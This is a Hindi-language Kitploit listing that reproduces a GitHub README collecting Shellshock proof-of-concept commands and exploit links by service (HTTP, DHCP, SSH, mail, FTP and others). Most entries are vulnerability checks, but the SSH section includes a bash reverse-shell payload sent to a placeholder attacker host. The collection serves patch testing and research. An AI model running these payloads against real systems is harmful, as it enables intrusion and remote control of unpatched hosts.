Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
shellshocker-pocs — #ShellShocker के लिए प्रूफ ऑफ कॉन्सेप्ट और संभावित लक्ष्यों का संग्रह | Kitploit
उपकरण/GitHubGitHub/mubix/shellshocker-pocs
भेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगचयनित संसाधन
GitHubmubix/shellshocker-pocs

shellshocker-pocs

#ShellShocker के लिए प्रूफ ऑफ कॉन्सेप्ट और संभावित लक्ष्यों का संग्रह

रिपॉजिटरी देखें
88919056 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Shellshocker - "Shellshock" प्रूफ ऑफ कॉन्सेप्ट कोड का संग्रह

#ShellShocker के लिए प्रूफ ऑफ कॉन्सेप्ट और संभावित लक्ष्यों का संग्रह

विकिपीडिया लिंक: https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details

यदि आपके पास और लिंक या अन्य संसाधन हैं, तो कृपया पुल रिक्वेस्ट सबमिट करें।

अटकलें:(गैर-पुष्ट, संभावित रूप से असुरक्षित)

  • XMPP(ejabberd)
  • Mailman - पुष्टि की गई है कि असुरक्षित नहीं है
  • MySQL
  • NFS
  • Bind9
  • Procmail देखें
  • Exim देखें
  • Juniper गूगल खोजinurl:inurl:/dana-na/auth/url_default/welcome.cgi
    • के माध्यम से: https://twitter.com/notsosecure/status/516132301025984512
    • के माध्यम से: http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10648&actp=RSS
  • Cisco Gear
    • के माध्यम से: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
  • FreePB / Asterix यहाँ पैच किया गया
  • यदि आप इनमें से किसी के लिए PoCs जानते हैं, तो कृपया लिंक के साथ एक इश्यू या पुल रिक्वेस्ट सबमिट करें।

    कमांड लाइन (Linux, OSX, और Cygwin के माध्यम से Windows)

    • bashcheck - नवीनतम कमजोरियों के परीक्षण के लिए स्क्रिप्ट

    CVE-2014-6271

    • env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id

    CVE-2014-7169

    यदि असुरक्षित है, तो cwd में echo नामक एक फ़ाइल बनाएगा जिसमें दिनांक होगा

    • env X='() { (a)=>\' bash -c "echo date"; cat echo

    CVE-2014-7186

    • bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"

    CVE-2014-7187

    • (for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"

    CVE-2014-6278

    • env X='() { _; } >_[$($())] { echo CVE-2014-6278 vulnerable; id; }' bash -c :
    • अतिरिक्त जानकारी: http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html

    CVE-2014-6277

    यदि असुरक्षित है, तो segfault होगा

    • env X='() { x() { _; }; x() { _; } <<a; }' bash -c :
    • fulldisclosure पर अतिरिक्त चर्चा: http://seclists.org/fulldisclosure/2014/Oct/9
    • अतिरिक्त जानकारी: http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html

    IBM z/OS -

    • http://mainframed767.tumblr.com/post/98446455927/bad-news-is-it-totally-works-in-bash-on-z-os-and

    HTTP

    • Metasploit एक्सप्लॉइट मॉड्यूल - Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
    • Metasploit एक्सप्लॉइट मॉड्यूल - Advantech Switch Bash Environment Variable Code Injection (Shellshock)
    • Metasploit एक्सप्लॉइट मॉड्यूल - IPFire Bash Environment Variable Injection (Shellshock)
    • HTTP हैडर पोल्यूशन @irsdl द्वारा - http://pastebin.com/QNkf7dYS
    • HTTP CGI-BIN - http://pastebin.com/166f8Rjx
    • cPanel - http://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html
    • Digital Alert Systems DASDEC - http://seclists.org/fulldisclosure/2014/Sep/107
    • F5 - https://twitter.com/securifybv/status/515035044294172673
      • https://twitter.com/securifybv/status/515035044294172673/photo/1
      • https://twitter.com/avalidnerd/status/515056463589675008
        • https://twitter.com/avalidnerd/status/515056463589675008/photo/1
    • Invisiblethreat.ca - https://www.invisiblethreat.ca/2014/09/cve-2014-6271/
    • कमांड लाइन संस्करण - https://gist.github.com/mfadzilr/70892f43597e7863a8dc
    • LiveHTTPHeaders के साथ User-Agent-आधारित वॉकथ्रू - http://www.lykostech.net/lab-time-exploiting-shellshock-bash-bug-virtual-server/
    • Burp के साथ User-Agent-आधारित वॉकथ्रू - http://oleaass.com/shellshock-proof-of-concept-reverse-shell/
    • User-Agent-आधारित लेकिन Tor और Socks5 का समर्थन करता है (Python) - https://github.com/lnxg33k/misc/blob/master/shellshock.py
    • Ruby में User-Agent-आधारित - https://github.com/securusglobal/BadBash
    • मल्टीथ्रेड समर्थन के साथ sleep का उपयोग करने वाला हेडर-आधारित सरल स्कैनर - https://github.com/gry/shellshock-scanner
    • shocker - किसी फ़ाइल में URL की सूची या एकल URL को ज्ञात असुरक्षित CGI संसाधनों की सूची के विरुद्ध जाँचता है (Content-type Method)
    • Xymon - https://lists.xymon.com/archive/2014-September/040350.html
    • QNAP - https://www.exploit-db.com/exploits/36503

    Phusion Passenger

    • https://news.ycombinator.com/item?id=8369776

    DHCP

    • Tftpd32 के माध्यम से Trusted sec शोषण - https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
    • Metasploit एक्सप्लॉइट मॉड्यूल - Dhclient Bash Environment Variable Injection (Shellshock)
    • Metasploit सहायक मॉड्यूल - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/dhclient_bash_env.rb
    • Perl स्क्रिप्ट - http://pastebin.com/S1WVzTv9
    • लोगों को नेटवर्क से जुड़ने के लिए मजबूर करने हेतु Wi-Fi पाइनएप्पल का उपयोग करना - http://d.uijn.nl/?p=32

    SSH

    • Stack Overflow - http://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh
    • SSH ForcedCommand - https://twitter.com/JZdziarski/status/515205581226123264
      • https://twitter.com/JZdziarski/status/515205581226123264/photo/1
    • SendEnv: LC_X='() { :; }; echo vulnerable' ssh [email protected] -o SendEnv=LC_X
    • Gitolite - https://twitter.com/Grifo/status/515089986161766400
      • $ ssh GITOLITEUSER@VULNERABLEIP '() { ignore;}; /bin/bash -i >& /dev/tcp/REVERSESHELLIP/PORT 0>&1'
      • (सर्वर पर git खाता होना आवश्यक है)

    OSX

    • VMware Fusion के माध्यम से Priv Escalation - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb
    • फिक्स: http://support.apple.com/kb/DL1769

    OSX - रिवर्स DNS के साथ (CVE-2014-3671.txt)

    • उदाहरण ज़ोन फ़ाइल: in-addr.arpa जिसमें CVE-2014-6271 का उदाहरण है।
    • एक getnameinfo() वाली उदाहरण फ़ाइल जो setenv() को आगे भेजती है: osx-rev-ptr.c
    • उपरोक्त के विवरण के साथ एडवाइज़री CVE-2014-3671.txt

    SIP

    • SIP प्रॉक्सी: https://github.com/zaf/sipshock

    Qmail

    • विस्तृत वॉकथ्रू - http://marc.info/?l=qmail&m=141183309314366&w=2
    • @ymzkei5 का ट्वीट - http://twitter.com/ymzkei5/status/515328039765307392
      • http://twitpic.com/ec3615
      • http://twitpic.com/ec361o

    Postfix

    • http://packetstormsecurity.com/files/128572/postfixsmtp-shellshock.txt

    FTP

    • Pure-FTPd: https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc
    • Metasploit एक्सप्लॉइट मॉड्यूल - Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)

    OpenVPN

    • OpenVPN - https://news.ycombinator.com/item?id=8385332
    • @fj33r द्वारा PoC वॉकथ्रू - http://sprunge.us/BGjP

    Oracle

    • चेतावनी और प्रभावित उत्पादों की सूची

    TMNT

    • https://twitter.com/SynAckPwn/status/514961810320293888/photo/1

    हाथ

    • @DJManilaIce के माध्यम से - http://pastie.org/9601055
    root@kitploit:~
    user@localhost:~$ env X='() { (a)=>\' /bin/bash -c "shellshocker echo -e \"           __ __\n          /  V  \ \n     _    |  |   |\n    / \   |  |   |\n    |  |  |  |   |\n    |  |  |  |   |\n    |  |__|  |   |\n    |  |  \  |___|___\n    |  \   |/        \ \n    |   |  |______    |\n    |   |  |          |\n    |   \__'   /     |\n    \        \(     /\n     \             /\n      \|            |\n\""; cat shellshocker
    /bin/bash: X: line 1: syntax error near unexpected token `='
    /bin/bash: X: line 1: `'
    /bin/bash: error importing function definition for `X'
               __ __
              /  V  \ 
         _    |  |   |
        / \   |  |   |
        |  |  |  |   |
        |  |  |  |   |
        |  |__|  |   |
        |  |  \  |___|___
        |  \   |/        \ 
        |   |  |______    |
        |   |  |          |
        |   \__'   /     |
        \        \(     /
         \             /
          \|            |
    
    

    CUPS

    • Metasploit एक्सप्लॉइट मॉड्यूल - CUPS Filter Bash Environment Variable Code Injection

    IRC

    • Metasploit एक्सप्लॉइट मॉड्यूल - Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
    • Metasploit एक्सप्लॉइट मॉड्यूल - Legend Perl IRC Bot Remote Code Execution

    @primalsec के स्क्रिप्ट्स

    • shell_shocker.py - कमांड पास करने के लिए ज्ञात असुरक्षित URL के साथ इंटरैक्ट करने हेतु उपयोगी (User-Agent Method)
    • w3af_shocker.py - w3af spider/shell_shock स्कैन चलाने की प्रक्रिया को स्वचालित करता है (User-Agent Method)
    • shell_sprayer.py - किसी फ़ाइल में URL की सूची या एकल URL को cgi-bin संसाधनों की ज्ञात सूची के विरुद्ध जाँचता है (User-Agent Method)
    टूल डाउनलोड करें